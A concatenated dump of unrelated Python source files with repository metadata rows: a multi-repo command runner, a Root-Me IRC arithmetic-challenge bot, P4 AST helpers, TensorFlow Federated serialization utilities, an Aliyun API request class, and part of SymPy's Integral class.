            None
        """
        self.gitignore_data.append(path + '/\n')

    def remove_gitignore(self, path: str) -> None:
        """
        Removes the path from the gitignore_data; a path that is not present
        is silently ignored

        Args:
            path (str): Path to be removed

        Returns:
            None
        """
        try:
            self.gitignore_data.remove(path + '/\n')
        except ValueError:
            return

    def is_primary_metarepo(self, repo: str) -> bool:
        """
        Returns a boolean if the repository is a primary meta-repository,
        i.e. its path resolves to the project directory itself

        Args:
            repo (str): Repository to check

        Returns:
            bool: Flag to indicate if repository is a primary meta-repository
        """
        return abspath(self.repositories[repo]["path"]) == self.project_dir

    def load(self) -> None:
        """
        Loads data from all supported file formats

        Returns:
            None
        """
        for file, interface in self.files.items():
            interface.load()

    def export(self) -> None:
        """
        Exports data to all supported file formats

        Returns:
            None
        """
        for file, interface in self.files.items():
            interface.export()

    def generate_tags(self) -> None:
        """
        Updates the tag indexes of the repositories (tag -> list of repo names)

        Returns:
            None
        """
        for repo, details in self.repositories.items():
            for tag in details.get('tags', []):
                if tag in self.tags:
                    self.tags[tag].append(repo)
                else:
                    self.tags[tag] = [repo]

    def apply(
            self,
            commands: List[str],
            repos: List[str] = (),
            shell: bool = False,
            python: bool = False,
    ) -> Generator[Tuple[str, str], None, None]:
        """
        Yields a list of commands to all repositories or a selected set of them, substitutes relevant parameters stored
        in .meta file

        Args:
            commands (List[str]): Commands to be applied
            repos (List[str]): Selected set of repositories; falls back to all
                repositories when the selection matches nothing
            shell (bool): Flag to indicate if a separate shell should be used
            python (bool): Flag to indicate if commands are to be tokenised as Python commands

        Returns:
            None
        """
        repositories: List[Tuple[str, Dict[str, str]]] = \
            [(repo, details) for repo, details in self.repositories.items() if repo in repos] or \
            list(self.repositories.items())
        for repo, details in repositories:
            # Generate complete set of parameters for substitution
            with self.cd(details['path']):
                repo_commands: List[str] = [
                    c.format(**self.generate_parameters(repo, details, python)) for c in deepcopy(commands)
                ]
                if python:
                    command: List[str] = self.python(repo_commands)
                elif shell:
                    command: List[str] = self.shell(repo_commands)
                else:
                    # Default: chain the commands with '&&' and tokenise once.
                    command: List[str] = self.tokenise(' && '.join(repo_commands))
                yield repo, command

    def generate_parameters(self, repo: str, repo_details: Dict, python: bool = False) -> Dict:
        """
        Generates the set of parameters for each repository to be substituted into command strings.

        Precedence (last wins): repository details < constants < environment
        variables.

        Args:
            repo (str): Repository name of parameters to be generated
            repo_details (Dict): Repository details from .meta file
            python (bool): Flag to indicate if Python variables should be generated, defaults to False

        Returns:
            Dict: Generated set of parameters
        """
        combined_details: Dict = {
            k: v.format(**self.env_vars) if isinstance(v, str) else v
            for k, v in deepcopy(repo_details).items()
        }
        if python:
            repositories: Dict = deepcopy(self.repositories)
            repositories[repo] = deepcopy(combined_details)
            # Rewrite JSON literals into Python literals so the string can be
            # embedded directly into a generated Python script.
            combined_details.update(
                {
                    '__repos__':
                        json.dumps(repositories)
                        .replace("true", "True")
                        .replace("false", "False")
                        .replace("null", "None")
                }
            )
        combined_details.update(self.constants)
        combined_details.update(self.env_vars)
        return combined_details

    @staticmethod
    def tokenise(command: str) -> List[str]:
        """
        Tokenises the commands into a form that is readily acceptable by subprocess

        Args:
            command (str): Constructed commands to be tokenised

        Returns:
            List[str]: Tokenised commands
        """
        return shlex.split(command)

    @contextmanager
    def cd(self, sub_directory: str) -> Generator[str, None, None]:
        """
        Changes directory to a subdirectory within the project

        NOTE(review): the original cwd is restored only on normal exit — an
        exception raised inside the `with` body skips the final chdir;
        consider try/finally if that matters to callers.

        Args:
            sub_directory (str): Relative subdirectory within the project

        Returns:
            Generator[str, None, None]: Path to current directory
        """
        cwd = getcwd()
        path = normpath(join(self.project_dir, sub_directory.lstrip('/')))
        chdir(path)
        yield path
        chdir(cwd)

    def shell(self, commands: List[str]) -> List[str]:
        """
        Prepares commands to be executed in a separate shell as subprocess does not natively handle piping

        Args:
            commands (List[str]): User-defined commands

        Returns:
            List[str]: Shell command string to be executed by subprocess
        """
        return self.tokenise(
            f'{SHELL} -c "' +
            ' && '.join(commands) +
            '"'
        )

    def python(self, commands: List[str]) -> List[str]:
        """
        Prepares commands to be executed by Python interpreter via shell

        NOTE(review): the quoting here only escapes double quotes; scripts
        containing single quotes will break the outer shell quoting — confirm
        inputs are constrained.

        Args:
            commands List[str]: Python scripts

        Returns:
            List[str]: Python prepared commands to be executed by subprocess
        """
        return self.shell(
            ["python3 -c \'{}\'".format(command.replace('"', '\\\"')) for command in commands]
        )
| 32.063492 | 119 | 0.525468 |
08eaa9970f08b13d7e355b4588231a01a56ba862 | 1,324 | py | Python | programming/back_to_school.py | sptoom/root-me | b55536d4572d048b0a22932bb447d6bd69e6fad9 | [
"MIT"
] | null | null | null | programming/back_to_school.py | sptoom/root-me | b55536d4572d048b0a22932bb447d6bd69e6fad9 | [
"MIT"
] | null | null | null | programming/back_to_school.py | sptoom/root-me | b55536d4572d048b0a22932bb447d6bd69e6fad9 | [
"MIT"
] | null | null | null | import socket, string, time, thread, math
SERVER = 'irc.root-me.org'
PORT = 6667
NICKNAME = 'sptoom'
CHANNEL = '#root-me_challenge'
BOTNAME = 'Candy'
def irc_connect():
global IRC
IRC = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
IRC.connect((SERVER, PORT))
def irc_command(command):
print(command)
IRC.send(command + '\n')
irc_connect()
irc_command("USER %s %s %s : Hey" % (NICKNAME, NICKNAME, NICKNAME))
irc_command("NICK %s" % NICKNAME)
irc_command("JOIN %s" % CHANNEL)
while (1):
text = IRC.recv(1024)
print(text)
if text.find('PING') != -1:
# answer PING from IRC server
msg = text.split()
if msg[0] == "PING":
irc_command("PONG %s" % msg[1] + '\n')
elif text.find("%s +x" % NICKNAME) != -1:
# detect that IRC chat was fully initialized and send PRIVMSG to bot
irc_command("PRIVMSG %s : !ep1" % BOTNAME)
elif text.find(BOTNAME) != -1 and text.find("PRIVMSG %s" % NICKNAME) != -1:
# detect and parse bot answer
if text.find(' / ') != -1:
numbers = text.split(' / ')
print(numbers)
sqroot = math.sqrt(float(numbers[0].split(':')[2]))
result = sqroot * float(numbers[1].split('\r')[0])
irc_command("PRIVMSG %s : !ep1 -rep %f" % (BOTNAME, result))
| 30.090909 | 79 | 0.587613 |
7e96e67e3743b9534f1203df196ac379f3e509a9 | 2,872 | py | Python | src/utils/p4ast.py | Anmol-007/l2l3_ACL_cartesian_product | 730f07f2c7ff4cdcd482a25491d8bd3883c835e1 | [
"Apache-2.0"
] | null | null | null | src/utils/p4ast.py | Anmol-007/l2l3_ACL_cartesian_product | 730f07f2c7ff4cdcd482a25491d8bd3883c835e1 | [
"Apache-2.0"
] | null | null | null | src/utils/p4ast.py | Anmol-007/l2l3_ACL_cartesian_product | 730f07f2c7ff4cdcd482a25491d8bd3883c835e1 | [
"Apache-2.0"
] | 1 | 2022-02-12T08:45:28.000Z | 2022-02-12T08:45:28.000Z | # Copyright 2016 Eotvos Lorand University, Budapest, Hungary
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from p4_hlir.frontend.ast import *
################################################################################
# Thin factory wrappers around the p4_hlir AST node constructors.  Each helper
# fills in the dummy filename ('') and line number (42) so callers only supply
# the semantically meaningful arguments.
def Integer(value): return P4Integer('', 42, value)
def FieldRefExpression(headerref, fieldname): return P4FieldRefExpression('', 42, headerref, str(fieldname))
def RefExpression(name): return P4RefExpression('', 42, str(name))
def ParserImmediateReturn(next_state): return P4ParserImmediateReturn('', 42, next_state)
def ParserSelectReturn(select, cases): return P4ParserSelectReturn('', 42, select, cases)
def ParserFunction(name, ops, ret): return P4ParserFunction('', 42, str(name), ops, ret)
def ParserSelectDefaultCase(next_state): return P4ParserSelectDefaultCase('', 42, next_state)
def ParserSelectCase(case, next_state): return P4ParserSelectCase('', 42, case, next_state)
def Table(name, action_spec, action_prof, reads, min_size, max_size, size, timeout): return P4Table('', 42, str(name), action_spec, action_prof, reads, min_size, max_size, size, timeout)
def ParserExtract(header): return P4ParserExtract('', 42, header)
def TableFieldMatch(field, typ): return P4TableFieldMatch('', 42, field, typ)
def HeaderType(name, layout, length, max_length): return P4HeaderType('', 42, str(name), layout, length, max_length)
def HeaderInstanceRegular(header_type, name): return P4HeaderInstanceRegular('', 42, header_type, str(name))
def HeaderInstanceMetadata(header_type, name): return P4HeaderInstanceMetadata('', 42, header_type, str(name))
def ActionCall(action): return P4ActionCall('', 42, action)
def ActionCallWP(action, parameters): return P4ActionCall('', 42, action, parameters)
def ActionFunction(name, params, body): return P4ActionFunction('', 42, str(name), params, body)
def BinaryExpression(op, left, right): return P4BinaryExpression('', 42, str(op), left, right)
# BUG FIX: `ControlFunction` was previously defined twice (once passing
# str(name), once passing name unchanged); the second definition silently
# shadowed the first.  The dead duplicate is removed, keeping the definition
# that was effective at runtime.
def ControlFunction(name, body): return P4ControlFunction('', 42, name, body)
def ControlFunctionApply(name): return P4ControlFunctionApply('', 42, name)
def ControlFunctionApplyAndSelect(name, cases): return P4ControlFunctionApplyAndSelect('', 42, name, cases)
def ControlFunctionApplyActionCase(case, next): return P4ControlFunctionApplyActionCase('', 42, case, next)
30f2c3546a836c380a75c6618d1fc0c71ec30774 | 12,722 | py | Python | tensorflow_federated/python/core/impl/executor_service_utils.py | VonRosenchild/federated | ad3986f8587a0f1dd0c6ce738db1fef436cb826f | [
"Apache-2.0"
] | 1 | 2019-10-10T06:19:52.000Z | 2019-10-10T06:19:52.000Z | tensorflow_federated/python/core/impl/executor_service_utils.py | wangcaihua/federated | c8c7fe84d20f6c16a2a9f290a05179b5422257b6 | [
"Apache-2.0"
] | null | null | null | tensorflow_federated/python/core/impl/executor_service_utils.py | wangcaihua/federated | c8c7fe84d20f6c16a2a9f290a05179b5422257b6 | [
"Apache-2.0"
] | 2 | 2019-10-10T06:19:41.000Z | 2021-01-28T03:06:55.000Z | # Lint as: python3
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A set of utility methods for `executor_service.py` and its clients."""
import numpy as np
import tensorflow as tf
from google.protobuf import any_pb2
from tensorflow_federated.proto.v0 import computation_pb2
from tensorflow_federated.proto.v0 import executor_pb2
from tensorflow_federated.python.common_libs import anonymous_tuple
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.impl import computation_impl
from tensorflow_federated.python.core.impl import tensorflow_serialization
from tensorflow_federated.python.core.impl import type_utils
from tensorflow_federated.python.core.impl.compiler import type_serialization
from tensorflow_federated.python.core.impl.utils import tensorflow_utils
def serialize_tensor_value(value, type_spec=None):
  """Serializes a tensor value into `executor_pb2.Value`.

  Args:
    value: A Numpy array or other object understood by `tf.make_tensor_proto`.
    type_spec: An optional type spec, a `tff.TensorType` or something
      convertible to it.

  Returns:
    A tuple `(value_proto, ret_type_spec)` in which `value_proto` is an instance
    of `executor_pb2.Value` with the serialized content of `value`, and
    `ret_type_spec` is the type of the serialized value. The `ret_type_spec` is
    the same as the argument `type_spec` if that argument was not `None`. If
    the argument was `None`, `ret_type_spec` is a type determined from `value`.

  Raises:
    TypeError: If the arguments are of the wrong types.
    ValueError: If the value is malformed.
  """
  if isinstance(value, tf.Tensor):
    # Eager tensors carry their own dtype/shape; use them when the caller did
    # not supply a type spec, then drop to a Numpy array for serialization.
    if type_spec is None:
      type_spec = computation_types.TensorType(
          dtype=tf.DType(value.dtype), shape=tf.TensorShape(value.shape))
    value = value.numpy()
  if type_spec is not None:
    type_spec = computation_types.to_type(type_spec)
    py_typecheck.check_type(type_spec, computation_types.TensorType)
    if isinstance(value, np.ndarray):
      # For ndarrays, serialize without shape verification and then check
      # assignability of the resulting type against the requested `type_spec`.
      tensor_proto = tf.make_tensor_proto(
          value, dtype=type_spec.dtype, verify_shape=False)
      type_utils.check_assignable_from(
          type_spec,
          computation_types.TensorType(
              dtype=tf.DType(tensor_proto.dtype),
              shape=tf.TensorShape(tensor_proto.tensor_shape)))
    else:
      # Scalars/lists: let TF enforce both dtype and shape during conversion.
      tensor_proto = tf.make_tensor_proto(
          value,
          dtype=type_spec.dtype,
          shape=type_spec.shape,
          verify_shape=True)
  else:
    # No type spec supplied: infer the TFF type from the serialized proto.
    tensor_proto = tf.make_tensor_proto(value)
    type_spec = computation_types.TensorType(
        dtype=tf.DType(tensor_proto.dtype),
        shape=tf.TensorShape(tensor_proto.tensor_shape))
  # Wrap the TensorProto in an Any, as expected by the Value message.
  any_pb = any_pb2.Any()
  any_pb.Pack(tensor_proto)
  return executor_pb2.Value(tensor=any_pb), type_spec
def deserialize_tensor_value(value_proto):
  """Deserializes a tensor value from `executor_pb2.Value`.

  Args:
    value_proto: An instance of `executor_pb2.Value`.

  Returns:
    A tuple `(value, type_spec)`, where `value` is a Numpy array that represents
    the deserialized value, and `type_spec` is an instance of `tff.TensorType`
    that represents its type.

  Raises:
    TypeError: If the arguments are of the wrong types.
    ValueError: If the value is malformed.
  """
  py_typecheck.check_type(value_proto, executor_pb2.Value)
  which_value = value_proto.WhichOneof('value')
  if which_value != 'tensor':
    raise ValueError('Not a tensor value: {}'.format(which_value))

  # TODO(b/134543154): Find some way of creating the `TensorProto` using a
  # proper public interface rather than creating a dummy value that we will
  # overwrite right away.
  tensor_proto = tf.make_tensor_proto(values=0)
  if not value_proto.tensor.Unpack(tensor_proto):
    raise ValueError('Unable to unpack the received tensor value.')

  # Rebuild the Numpy array and derive its TFF tensor type from the proto.
  tensor_value = tf.make_ndarray(tensor_proto)
  value_type = computation_types.TensorType(
      dtype=tf.DType(tensor_proto.dtype),
      shape=tf.TensorShape(tensor_proto.tensor_shape))
  return tensor_value, value_type
def serialize_sequence_value(value):
  """Serializes a `tf.data.Dataset` value into `executor_pb2.Value`.

  Args:
    value: A `tf.data.Dataset`, or equivalent.

  Returns:
    An instance of `executor_pb2.Value` whose `sequence` field carries the
    zipped SavedModel serialization of `value` together with its serialized
    element type.  (Note: unlike the other serializers in this module, this
    function returns only the proto, not a `(proto, type)` tuple.)
  """
  py_typecheck.check_type(value, tensorflow_utils.DATASET_REPRESENTATION_TYPES)
  # The element type must be stored explicitly: TF loses the key ordering of
  # `collections.Mapping`-typed dataset elements, and the stored TFF type
  # allows deserialization to restore it.
  structure = tf.data.experimental.get_structure(value)
  element_type = computation_types.to_type(structure)
  zipped_model = tensorflow_serialization.serialize_dataset(value)
  sequence_pb = executor_pb2.Value.Sequence(
      zipped_saved_model=zipped_model,
      element_type=type_serialization.serialize_type(element_type))
  return executor_pb2.Value(sequence=sequence_pb)
def deserialize_sequence_value(sequence_value_proto):
  """Deserializes a `tf.data.Dataset`.

  Args:
    sequence_value_proto: `Sequence` protocol buffer message.

  Returns:
    A tuple of `(tf.data.Dataset, tff.Type)`.

  Raises:
    NotImplementedError: If the sequence is encoded in a format other than
      `zipped_saved_model`.
  """
  py_typecheck.check_type(sequence_value_proto, executor_pb2.Value.Sequence)

  which_value = sequence_value_proto.WhichOneof('value')
  if which_value == 'zipped_saved_model':
    ds = tensorflow_serialization.deserialize_dataset(
        sequence_value_proto.zipped_saved_model)
  else:
    # Only the zipped SavedModel encoding is currently supported.
    raise NotImplementedError(
        'Deserializing Sequences enocded as {!s} has not been implemented'
        .format(which_value))

  element_type = type_serialization.deserialize_type(
      sequence_value_proto.element_type)

  # If a serialized dataset had elements of nested structes of tensors (e.g.
  # `dict`, `OrderedDict`), the deserialized dataset will return `dict`,
  # `tuple`, or `namedtuple` (loses `collections.OrderedDict` in a conversion).
  #
  # Since the dataset will only be used inside TFF, we wrap the dictionary
  # coming from TF in an `OrderedDict` when necessary (a type that both TF and
  # TFF understand), using the field order stored in the TFF type stored during
  # serialization.
  ds = tensorflow_utils.coerce_dataset_elements_to_tff_type_spec(
      ds, element_type)

  return ds, computation_types.SequenceType(element=element_type)
def serialize_value(value, type_spec=None):
  """Serializes a value into `executor_pb2.Value`.

  Dispatches on the Python type of `value` first (computation protos and
  `ComputationImpl` instances), then on the TFF `type_spec` (tensor, named
  tuple, sequence, federated); the order of these checks matters because a
  computation proto must be recognized before any type-driven branch.

  Args:
    value: A value to be serialized.
    type_spec: Optional type spec, a `tff.Type` or something convertible to it.
  Returns:
    A tuple `(value_proto, ret_type_spec)` where `value_proto` is an instance
    of `executor_pb2.Value` with the serialized content of `value`, and the
    returned `ret_type_spec` is an instance of `tff.Type` that represents the
    TFF type of the serialized value.
  Raises:
    TypeError: If the arguments are of the wrong types.
    ValueError: If the value is malformed.
  """
  type_spec = computation_types.to_type(type_spec)
  if isinstance(value, computation_pb2.Computation):
    # A computation proto carries its own type; reconcile it with the
    # caller-supplied type_spec (if any) rather than trusting either alone.
    type_spec = type_utils.reconcile_value_type_with_type_spec(
        type_serialization.deserialize_type(value.type), type_spec)
    return executor_pb2.Value(computation=value), type_spec
  elif isinstance(value, computation_impl.ComputationImpl):
    # Unwrap to the underlying proto and recurse into the branch above.
    return serialize_value(
        computation_impl.ComputationImpl.get_proto(value),
        type_utils.reconcile_value_with_type_spec(value, type_spec))
  elif isinstance(type_spec, computation_types.TensorType):
    return serialize_tensor_value(value, type_spec)
  elif isinstance(type_spec, computation_types.NamedTupleType):
    # Serialize element-wise, pairing each type element with the
    # corresponding value element by position.
    type_elements = anonymous_tuple.to_elements(type_spec)
    val_elements = anonymous_tuple.to_elements(
        anonymous_tuple.from_container(value))
    tup_elems = []
    for (e_name, e_type), (_, e_val) in zip(type_elements, val_elements):
      e_proto, _ = serialize_value(e_val, e_type)
      tup_elems.append(
          executor_pb2.Value.Tuple.Element(
              name=e_name if e_name else None, value=e_proto))
    result_proto = (
        executor_pb2.Value(tuple=executor_pb2.Value.Tuple(element=tup_elems)))
    return result_proto, type_spec
  elif isinstance(type_spec, computation_types.SequenceType):
    if not isinstance(value, tensorflow_utils.DATASET_REPRESENTATION_TYPES):
      raise TypeError(
          'Cannot serialize Python type {!s} as TFF type {!s}.'.format(
              py_typecheck.type_string(type(value)),
              type_spec if type_spec is not None else 'unknown'))
    # Check that the dataset's actual element structure is assignable to the
    # declared sequence element type before serializing.
    value_type = computation_types.SequenceType(
        computation_types.to_type(tf.data.experimental.get_structure(value)))
    if not type_utils.is_assignable_from(type_spec, value_type):
      raise TypeError(
          'Cannot serialize dataset with elements of type {!s} as TFF type {!s}.'
          .format(value_type,
                  type_spec if type_spec is not None else 'unknown'))
    return serialize_sequence_value(value), type_spec
  elif isinstance(type_spec, computation_types.FederatedType):
    # An all_equal federated value is represented by a single member
    # constituent; otherwise a list of constituents is expected.
    if type_spec.all_equal:
      value = [value]
    else:
      py_typecheck.check_type(value, list)
    items = []
    for v in value:
      it, it_type = serialize_value(v, type_spec.member)
      type_utils.check_assignable_from(type_spec.member, it_type)
      items.append(it)
    result_proto = executor_pb2.Value(
        federated=executor_pb2.Value.Federated(
            type=type_serialization.serialize_type(type_spec).federated,
            value=items))
    return result_proto, type_spec
  else:
    raise ValueError(
        'Unable to serialize value with Python type {} and {} TFF type.'.format(
            str(py_typecheck.type_string(type(value))),
            str(type_spec) if type_spec is not None else 'unknown'))
def deserialize_value(value_proto):
  """Deserializes a value (of any type) from `executor_pb2.Value`.

  Dispatches on which oneof field of the proto is set: `tensor`,
  `computation`, `tuple`, `sequence`, or `federated`.

  Args:
    value_proto: An instance of `executor_pb2.Value`.
  Returns:
    A tuple `(value, type_spec)`, where `value` is a deserialized
    representation of the transmitted value (e.g., Numpy array, or a
    `pb.Computation` instance), and `type_spec` is an instance of
    `tff.TensorType` that represents its type.
  Raises:
    TypeError: If the arguments are of the wrong types.
    ValueError: If the value is malformed.
  """
  py_typecheck.check_type(value_proto, executor_pb2.Value)
  which_value = value_proto.WhichOneof('value')
  if which_value == 'tensor':
    return deserialize_tensor_value(value_proto)
  elif which_value == 'computation':
    return (value_proto.computation,
            type_serialization.deserialize_type(value_proto.computation.type))
  elif which_value == 'tuple':
    # Recursively deserialize each element; unnamed elements contribute a
    # bare type instead of a (name, type) pair.
    val_elems = []
    type_elems = []
    for e in value_proto.tuple.element:
      name = e.name if e.name else None
      e_val, e_type = deserialize_value(e.value)
      val_elems.append((name, e_val))
      type_elems.append((name, e_type) if name else e_type)
    return (anonymous_tuple.AnonymousTuple(val_elems),
            computation_types.NamedTupleType(type_elems))
  elif which_value == 'sequence':
    return deserialize_sequence_value(value_proto.sequence)
  elif which_value == 'federated':
    type_spec = type_serialization.deserialize_type(
        computation_pb2.Type(federated=value_proto.federated.type))
    value = []
    for item in value_proto.federated.value:
      item_value, item_type = deserialize_value(item)
      type_utils.check_assignable_from(type_spec.member, item_type)
      value.append(item_value)
    if type_spec.all_equal:
      # An all_equal federated value must be carried by exactly one member
      # constituent, which becomes the deserialized value itself.
      if len(value) == 1:
        value = value[0]
      else:
        # Fixed typo in the error message ("consatituents" -> "constituents").
        raise ValueError(
            'Return an all_equal value with {} member constituents.'.format(
                len(value)))
    return value, type_spec
  else:
    raise ValueError(
        'Unable to deserialize a value of type {}.'.format(which_value))
| 40.645367 | 81 | 0.734319 |
cf39c4adaed535c2777301270dab5d949045991c | 2,136 | py | Python | aliyun-python-sdk-cloudapi/aliyunsdkcloudapi/request/v20160714/SetTrafficControlApisRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 1,001 | 2015-07-24T01:32:41.000Z | 2022-03-25T01:28:18.000Z | aliyun-python-sdk-cloudapi/aliyunsdkcloudapi/request/v20160714/SetTrafficControlApisRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 363 | 2015-10-20T03:15:00.000Z | 2022-03-08T12:26:19.000Z | aliyun-python-sdk-cloudapi/aliyunsdkcloudapi/request/v20160714/SetTrafficControlApisRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 682 | 2015-09-22T07:19:02.000Z | 2022-03-22T09:51:46.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkcloudapi.endpoint import endpoint_data
class SetTrafficControlApisRequest(RpcRequest):
    """Request binding one or more APIs to a traffic-control policy.

    Wraps the CloudAPI (version 2016-07-14) ``SetTrafficControlApis`` RPC
    action; each getter/setter pair below mirrors a single query parameter.
    """

    def __init__(self):
        RpcRequest.__init__(self, 'CloudAPI', '2016-07-14', 'SetTrafficControlApis','apigateway')
        # Install endpoint routing tables when the SDK core supports them.
        for attr_name, loader in (
                ("endpoint_map", endpoint_data.getEndpointMap),
                ("endpoint_regional", endpoint_data.getEndpointRegional)):
            if hasattr(self, attr_name):
                setattr(self, attr_name, loader())

    def _query(self, name):
        # Shared lookup used by every getter below.
        return self.get_query_params().get(name)

    def get_TrafficControlId(self):
        return self._query('TrafficControlId')

    def set_TrafficControlId(self, TrafficControlId):
        self.add_query_param('TrafficControlId', TrafficControlId)

    def get_StageName(self):
        return self._query('StageName')

    def set_StageName(self, StageName):
        self.add_query_param('StageName', StageName)

    def get_GroupId(self):
        return self._query('GroupId')

    def set_GroupId(self, GroupId):
        self.add_query_param('GroupId', GroupId)

    def get_SecurityToken(self):
        return self._query('SecurityToken')

    def set_SecurityToken(self, SecurityToken):
        self.add_query_param('SecurityToken', SecurityToken)

    def get_ApiIds(self):
        return self._query('ApiIds')

    def set_ApiIds(self, ApiIds):
        self.add_query_param('ApiIds', ApiIds)
3119d84522ba52c069d9d3a861d66b0cb18bd5bc | 57,759 | py | Python | sympy/integrals/integrals.py | STALKER2010/sympy-bleeding-edge | 81233029a9a30866747f6da2c0e9604d1681d474 | [
"BSD-3-Clause"
] | 2 | 2018-12-05T02:30:43.000Z | 2020-11-14T01:43:15.000Z | sympy/integrals/integrals.py | STALKER2010/sympy-bleeding-edge | 81233029a9a30866747f6da2c0e9604d1681d474 | [
"BSD-3-Clause"
] | null | null | null | sympy/integrals/integrals.py | STALKER2010/sympy-bleeding-edge | 81233029a9a30866747f6da2c0e9604d1681d474 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function, division
from sympy.concrete.expr_with_limits import AddWithLimits
from sympy.core.add import Add
from sympy.core.basic import Basic
from sympy.core.compatibility import is_sequence, range
from sympy.core.containers import Tuple
from sympy.core.expr import Expr
from sympy.core.function import diff
from sympy.core.mul import Mul
from sympy.core.numbers import oo, pi
from sympy.core.relational import Eq, Ne
from sympy.core.singleton import S
from sympy.core.symbol import (Dummy, Symbol, Wild)
from sympy.core.sympify import sympify
from sympy.integrals.manualintegrate import manualintegrate
from sympy.integrals.trigonometry import trigintegrate
from sympy.integrals.meijerint import meijerint_definite, meijerint_indefinite
from sympy.matrices import MatrixBase
from sympy.utilities.misc import filldedent
from sympy.polys import Poly, PolynomialError
from sympy.functions import Piecewise, sqrt, sign, piecewise_fold, tan, cot, atan
from sympy.functions.elementary.exponential import log
from sympy.functions.elementary.integers import floor
from sympy.functions.elementary.complexes import Abs, sign
from sympy.functions.elementary.miscellaneous import Min, Max
from sympy.series import limit
from sympy.series.order import Order
from sympy.series.formal import FormalPowerSeries
from sympy.simplify.fu import sincos_to_sum
class Integral(AddWithLimits):
"""Represents unevaluated integral."""
__slots__ = ['is_commutative']
def __new__(cls, function, *symbols, **assumptions):
"""Create an unevaluated integral.
Arguments are an integrand followed by one or more limits.
If no limits are given and there is only one free symbol in the
expression, that symbol will be used, otherwise an error will be
raised.
>>> from sympy import Integral
>>> from sympy.abc import x, y
>>> Integral(x)
Integral(x, x)
>>> Integral(y)
Integral(y, y)
When limits are provided, they are interpreted as follows (using
``x`` as though it were the variable of integration):
(x,) or x - indefinite integral
(x, a) - "evaluate at" integral is an abstract antiderivative
(x, a, b) - definite integral
The ``as_dummy`` method can be used to see which symbols cannot be
targeted by subs: those with a preppended underscore cannot be
changed with ``subs``. (Also, the integration variables themselves --
the first element of a limit -- can never be changed by subs.)
>>> i = Integral(x, x)
>>> at = Integral(x, (x, x))
>>> i.as_dummy()
Integral(x, x)
>>> at.as_dummy()
Integral(_x, (_x, x))
"""
#This will help other classes define their own definitions
#of behaviour with Integral.
if hasattr(function, '_eval_Integral'):
return function._eval_Integral(*symbols, **assumptions)
obj = AddWithLimits.__new__(cls, function, *symbols, **assumptions)
return obj
def __getnewargs__(self):
return (self.function,) + tuple([tuple(xab) for xab in self.limits])
@property
def free_symbols(self):
"""
This method returns the symbols that will exist when the
integral is evaluated. This is useful if one is trying to
determine whether an integral depends on a certain
symbol or not.
Examples
========
>>> from sympy import Integral
>>> from sympy.abc import x, y
>>> Integral(x, (x, y, 1)).free_symbols
{y}
See Also
========
function, limits, variables
"""
return AddWithLimits.free_symbols.fget(self)
    def _eval_is_zero(self):
        # Fuzzy three-valued assumption query: return True (surely zero),
        # False (surely nonzero) or None (cannot tell).
        # This is a very naive and quick test, not intended to do the integral to
        # answer whether it is zero or not, e.g. Integral(sin(x), (x, 0, 2*pi))
        # is zero but this routine should return None for that case. But, like
        # Mul, there are trivial situations for which the integral will be
        # zero so we check for those.
        if self.function.is_zero:
            return True
        got_none = False
        for l in self.limits:
            if len(l) == 3:
                # a definite integral over an interval of zero width is zero
                z = (l[1] == l[2]) or (l[1] - l[2]).is_zero
                if z:
                    return True
                elif z is None:
                    got_none = True
        free = self.function.free_symbols
        for xab in self.limits:
            if len(xab) == 1:
                free.add(xab[0])
                continue
            if len(xab) == 2 and xab[0] not in free:
                # "evaluate at 0" of an antiderivative in a symbol the
                # integrand does not contain gives zero
                if xab[1].is_zero:
                    return True
                elif xab[1].is_zero is None:
                    got_none = True
            # take integration symbol out of free since it will be replaced
            # with the free symbols in the limits
            free.discard(xab[0])
            # add in the new symbols
            for i in xab[1:]:
                free.update(i.free_symbols)
        if self.function.is_zero is False and got_none is False:
            return False
        # otherwise undecided: fall through and implicitly return None
    def transform(self, x, u):
        r"""
        Performs a change of variables from `x` to `u` using the relationship
        given by `x` and `u` which will define the transformations `f` and `F`
        (which are inverses of each other) as follows:

        1) If `x` is a Symbol (which is a variable of integration) then `u`
           will be interpreted as some function, f(u), with inverse F(u).
           This, in effect, just makes the substitution of x with f(x).

        2) If `u` is a Symbol then `x` will be interpreted as some function,
           F(x), with inverse f(u). This is commonly referred to as
           u-substitution.

        Once f and F have been identified, the transformation is made as
        follows:

        .. math:: \int_a^b x \mathrm{d}x \rightarrow \int_{F(a)}^{F(b)} f(x)
                  \frac{\mathrm{d}}{\mathrm{d}x}

        where `F(x)` is the inverse of `f(x)` and the limits and integrand have
        been corrected so as to retain the same value after integration.

        Notes
        =====

